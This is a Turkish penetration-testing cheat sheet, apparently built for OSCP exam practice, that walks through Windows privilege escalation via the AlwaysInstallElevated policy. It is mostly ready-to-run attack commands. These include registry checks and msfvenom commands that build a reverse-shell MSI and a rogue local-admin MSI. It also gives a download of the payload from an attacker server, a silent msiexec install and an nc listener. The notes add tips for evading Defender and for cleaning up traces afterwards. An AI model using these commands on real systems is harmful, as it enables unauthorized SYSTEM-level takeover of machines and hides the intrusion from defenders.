FOOTHOLD Metodoloji Cheat-sheet
PrivEsc ✓ EXAM-SAFE kolay

AlwaysInstallElevated — SYSTEM Yetkisiyle .MSI Kurulumu

AlwaysInstallElevated politikasi hem HKLM hem HKCU altinda 1 ise, herhangi bir kullanici .msi paketlerini NT AUTHORITY\SYSTEM yetkisiyle kurabilir. msfvenom ile uretilen kotu amacli MSI msiexec ile calistirilarak SYSTEM elde edilir.

Bilgi: ÖN KOŞULLAR
  • Dusuk yetkili etkilesimli/komut satiri erisimi
  • Kali tarafinda msfvenom (Metasploit) kurulu
┌──

Komutlar

cmd ✓ EXAM-SAFE user
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKLM tarafinda AlwaysInstallElevated degerini sorgula (1 olmali) HackTricks — Windows Local Privilege Escalation (AlwaysInstallElevated)
cmd ✓ EXAM-SAFE user
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKCU tarafinda AlwaysInstallElevated degerini sorgula; iki tarafin da 1 olmasi sart HackTricks — Windows Local Privilege Escalation (AlwaysInstallElevated)
msfvenom ✓ EXAM-SAFE
msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f msi -o evil.msi
SYSTEM olarak calisacak reverse shell MSI paketi uret (x64 hedef) HackTricks — Windows Local Privilege Escalation (AlwaysInstallElevated)
msfvenom ✓ EXAM-SAFE
msfvenom -p windows/adduser USER=hacker PASS=Passw0rd123! -f msi -o adduser.msi
Alternatif: yeni lokal admin kullanici ekleyen MSI (reverse shell yerine) HackTricks — Windows Local Privilege Escalation (AlwaysInstallElevated)
powershell ✓ EXAM-SAFE user
iwr -Uri {{URL}}/evil.msi -OutFile C:\Windows\Temp\evil.msi
MSI dosyasini Kali HTTP sunucusundan hedefe indir LOLBAS: Msiexec.exe / HackTricks — File Transfer
cmd ✓ EXAM-SAFE user
msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
MSI'yi sessizce kur; AlwaysInstallElevated nedeniyle SYSTEM olarak calisir LOLBAS: Msiexec.exe
powershell ✓ EXAM-SAFE user
powerpick Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer','HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -EA SilentlyContinue
PowerShell ile her iki anahtari tek seferde kontrol et HackTricks — Windows Local Privilege Escalation

Genel Bakis

AlwaysInstallElevated, Windows Installer’in MSI paketlerini her zaman yukseltilmis (elevated) yetkiyle kurmasini saglayan bir grup politikasi ayaridir. Bu ayar hem HKLM hem de HKCU altinda etkin (deger 1) oldugunda, dusuk yetkili herhangi bir kullanici kendi hazirladigi MSI paketini NT AUTHORITY\SYSTEM baglaminda calistirabilir. Tek tarafta 1 olmasi yetmez; ikisi de gereklidir.

Tespit / Enumerasyon

Ilk olarak iki registry anahtarini da dogrulayin. winPEAS bu kontrolu otomatik yapar ve AlwaysInstallElevated set to 1 in HKLM and HKCU!!! seklinde kirmizi isaretler. Manuel olarak reg query ile her iki kovani kontrol edin; her ikisinin de 0x1 dondurmesi exploit’in calisacagini gosterir.

Sömürü Akisi

  1. Kali’de msfvenom ile bir MSI payload uretin. Hedef mimarisine dikkat edin (x64/x86).
  2. MSI’yi python3 -m http.server ile servis edip hedefe iwr/certutil ile indirin.
  3. msiexec /quiet /qn /i ile kurun. /quiet /qn UI’yi bastirir, arka planda SYSTEM olarak yuk calisir.
  4. Reverse shell payload kullandiysaniz once Kali’de nc -lvnp {{LPORT}} ile dinleyici acin.

Notlar

  • Reverse shell yerine windows/adduser ile dogrudan lokal admin eklemek daha sessiz ve guvenilir olabilir; sonra runas veya RDP/evil-winrm ile giris yapilir.
  • Bazi ortamlarda Defender MSI payload’ini yakalar; standart msfvenom shellcode tetiklenebilir. OSCP baglaminda encoder yerine farkli bir -f formati veya custom MSI (WiX) tercih edilebilir.
  • Exploit sonrasi olusturulan MSI ve gecici dosyalari C:\Windows\Temp’ten temizlemeyi unutmayin.
┌──

Kaynaklar

↗ HackTricks — Windows Local Privilege Escalation (AlwaysInstallElevated)↗ LOLBAS: Msiexec.exePayloadsAllTheThings — Windows Privilege Escalation
0/15 set